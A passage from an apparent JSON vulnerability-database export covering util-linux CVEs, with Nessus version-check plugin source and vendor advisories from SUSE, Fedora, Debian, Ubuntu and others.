'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n 
if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libblkid / libblkid-debuginfo / libblkid-devel / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T14:53:27", "description": "According to the versions of the util-linux package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an 'INPUTRC' environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\n - A logical error was found in util-linux's libmount library in a function that allows unprivileged users to unmount FUSE filesystems. Incorrect uid checking allows unprivileged users to unmount FUSE filesystems with similar uid users, an attacker could exploit this vulnerability to cause a denial of service. (CVE-2021-3995)\n\n - A logical error was found in util-linux's libmount library in a function that allows unprivileged users to unmount FUSE filesystems. Issues related to parsing the /proc/self/mountinfo file allow unprivileged users to unmount other users' filesystems that are themselves world-writable (such as /tmp) or mounted in a world-writable directory. 
An attacker could exploit this vulnerability to cause a denial of service. (CVE-2021-3996)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-07-15T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.10.1 : util-linux (EulerOS-SA-2022-2069)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-10-17T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:util-linux", "cpe:/o:huawei:euleros:uvp:2.10.1"], "id": "EULEROS_SA-2022-2069.NASL", "href": "https://www.tenable.com/plugins/nessus/163219", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163219);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/17\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"EulerOS Virtualization 2.10.1 : util-linux (EulerOS-SA-2022-2069)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux package installed, the EulerOS Virtualization installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an 'INPUTRC' environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. 
This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\n - A logical error was found in util-linux's libmount library in a function that allows unprivileged users to\n unmount FUSE filesystems. Incorrect uid checking allows unprivileged users to unmount FUSE filesystems\n with similar uid users, an attacker could exploit this vulnerability to cause a denial of (CVE-2021-3995)\n\n - that allows unprivileged users to unmount FUSE filesystems. Issues related to parsing the\n /proc/self/mountinfo file allow unprivileged users to unmount other users' filesystems that are themselves\n world-writable (such as /tmp) or mounted in a world-writable directory. An attacker could exploit this\n (CVE-2021-3996)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-2069\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf922d33\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2022/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.10.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.10.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.10.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"util-linux-2.35.2-2.h24.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-19T14:58:22", "description": "According to the versions of the util-linux package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an 'INPUTRC' environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\n - A logical error was found in util-linux's libmount library in a function that allows unprivileged users to unmount FUSE filesystems. Incorrect uid checking allows unprivileged users to unmount FUSE filesystems with similar uid users, an attacker could exploit this vulnerability to cause a denial of (CVE-2021-3995)\n\n - that allows unprivileged users to unmount FUSE filesystems. Issues related to parsing the /proc/self/mountinfo file allow unprivileged users to unmount other users' filesystems that are themselves world-writable (such as /tmp) or mounted in a world-writable directory. An attacker could exploit this (CVE-2021-3996)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-07-15T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.10.0 : util-linux (EulerOS-SA-2022-2041)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-10-18T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:util-linux", "cpe:/o:huawei:euleros:uvp:2.10.0"], "id": "EULEROS_SA-2022-2041.NASL", "href": "https://www.tenable.com/plugins/nessus/163197", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163197);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/18\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"EulerOS Virtualization 2.10.0 : util-linux (EulerOS-SA-2022-2041)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux package installed, the EulerOS Virtualization installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an 'INPUTRC' environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\n - A logical error was found in util-linux's libmount library in a function that allows unprivileged users to\n unmount FUSE filesystems. 
Incorrect uid checking allows unprivileged users to unmount FUSE filesystems\n with similar uid users, an attacker could exploit this vulnerability to cause a denial of (CVE-2021-3995)\n\n - that allows unprivileged users to unmount FUSE filesystems. Issues related to parsing the\n /proc/self/mountinfo file allow unprivileged users to unmount other users' filesystems that are themselves\n world-writable (such as /tmp) or mounted in a world-writable directory. An attacker could exploit this\n (CVE-2021-3996)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-2041\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?469fad5d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.10.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.10.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.10.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"util-linux-2.35.2-2.h24.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2022-08-29T22:05:00", "description": "An update that solves two vulnerabilities, 
contains two\n features and has two fixes is now available.\n\nDescription:\n\n This security update for libeconf, shadow and util-linux fixes the following\n issues:\n\n libeconf:\n\n - Add libeconf to SLE-Module-Basesystem_15-SP3 because needed by\n 'util-linux' and 'shadow' to fix autoyast handling of security related\n parameters (bsc#1192954, jsc#SLE-23384, jsc#SLE-23402)\n\n Issues fixed in libeconf:\n - Reading numbers with different bases (e.g. octal) (bsc#1193632) (#157)\n - Fixed different issues while writing string values to file.\n - Writing comments to file too.\n - Fixed crash while merging values.\n - Added econftool cat option (#146)\n - new API call: econf_readDirsHistory (showing ALL locations)\n - new API call: econf_getPath (absolute path of the configuration file)\n - Man pages libeconf.3 and econftool.8.\n - Handling multiline strings.\n - Added libeconf_ext which returns more information like line_nr,\n comments, path of the configuration file,...\n - Econftool, a command line interface for handling configuration files.\n - Generating HTML API documentation with doxygen.\n - Improving error handling and semantic file check.\n - Joining entries with the same key to one single entry if env variable\n ECONF_JOIN_SAME_ENTRIES has been set.\n\n shadow:\n\n - The legacy code does not support /etc/login.defs.d used by YaST. Enable\n libeconf to read it (bsc#1192954, jsc#SLE-23384, jsc#SLE-23402)\n\n util-linux:\n\n - The legacy code does not support /etc/login.defs.d used by YaST. 
Enable\n libeconf to read it (bsc#1192954, jsc#SLE-23384, jsc#SLE-23402)\n - Allow use of larger values for start sector to prevent `blockdev\n --report` aborting (bsc#1188507)\n - Fixed `blockdev --report` using non-space characters as a field\n separator (bsc#1188507)\n - CVE-2021-3995: Fixed unauthorized unmount in util-linux's libmount.\n (bsc#1194976)\n - CVE-2021-3996: Fixed unauthorized unmount in util-linux's libmount.\n (bsc#1194976)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2022-727=1", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-04T00:00:00", "type": "suse", "title": "Security update for libeconf, shadow and util-linux (moderate)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-03-04T00:00:00", "id": "OPENSUSE-SU-2022:0727-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/GUBUSLRBG42MLRL65HHMLIWQIKS3SKKP/", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2023-12-02T16:02:16", "description": "The util-linux package contains a large variety of low-level system utilities that are necessary for a Linux system to function. Among others, Util-linux contains the fdisk configuration tool and the login program. 
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-05T01:22:21", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: util-linux-2.37.3-1.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-02-05T01:22:21", "id": "FEDORA:71F07304C271", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SW73IARDAP7WWQ6ETYQB2OS2SLW4XTT3/", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2023-12-01T18:56:58", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5055-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 24, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : util-linux\nCVE ID : CVE-2021-3995 CVE-2021-3996\n\nThe Qualys Research Labs discovered two vulnerabilities in util-linux's\nlibmount. 
These flaws allow an unprivileged user to unmount other users'\nfilesystems that are either world-writable themselves or mounted in a\nworld-writable directory (CVE-2021-3996), or to unmount FUSE filesystems\nthat belong to certain other users (CVE-2021-3995).\n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 2.36.1-8+deb11u1.\n\nWe recommend that you upgrade your util-linux packages.\n\nFor the detailed security status of util-linux please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/util-linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-24T11:31:30", "type": "debian", "title": "[SECURITY] [DSA 5055-1] util-linux security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-01-24T11:31:30", "id": "DEBIAN:DSA-5055-1:E8123", "href": 
"https://lists.debian.org/debian-security-announce/2022/msg00021.html", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "redos": [{"lastseen": "2023-12-02T16:31:42", "description": "A vulnerability in the standard util-linux command line utility package is related to incorrect parsing of the /proc/self/mountinfo file in libmount. Exploitation of the vulnerability could allow an attacker to unmount other users' filesystems that are either writable or mounted in a writable directory.\n\nA vulnerability in the standard util-linux command line utility package is related to incorrect UID checking in libmount. Exploitation of the vulnerability could allow an attacker to unmount the FUSE file systems of users with a similar UID.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-28T00:00:00", "type": "redos", "title": "ROS-20220128-03", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-01-28T00:00:00", "id": "ROS-20220128-03", 
"href": "https://redos.red-soft.ru/support/secure/uyazvimosti/uyazvimost-util-linux-cve-2021-3996-cve-2021-3995/", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2023-12-02T18:48:52", "description": "## Releases\n\n * Ubuntu 21.10 \n * Ubuntu 20.04 LTS\n\n## Packages\n\n * util-linux \\- miscellaneous system utilities\n\nIt was discovered that util-linux incorrectly handled unmounting FUSE \nfilesystems. A local attacker could possibly use this issue to unmount \nFUSE filesystems belonging to other users.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-09T00:00:00", "type": "ubuntu", "title": "util-linux vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-02-09T00:00:00", "id": "USN-5279-1", "href": "https://ubuntu.com/security/notices/USN-5279-1", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "mageia": [{"lastseen": "2023-12-02T16:53:33", "description": "An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use 
system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments. (CVE-2021-37600) Unauthorized unmount of FUSE filesystems belonging to users with similar uid. (CVE-2021-3995) Unauthorized unmount of filesystems in libmount (CVE-2021-3996) A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an \"INPUTRC\" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563) Additional bug fixes included by updating to version 2.36.2. See release notes for details. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-02-22T20:15:16", "type": "mageia", "title": "Updated util-linux packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37600", "CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2022-02-22T20:15:16", "id": "MGASA-2022-0076", "href": "https://advisories.mageia.org/MGASA-2022-0076.html", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "photon": [{"lastseen": "2022-05-12T18:53:15", "description": "Updates of ['rust', 'polkit', 'util-linux'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-27T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-0147", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-4034", "CVE-2022-21658"], "modified": "2022-01-27T00:00:00", "id": "PHSA-2022-0147", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-147", "cvss": {"score": 7.2, "vector": 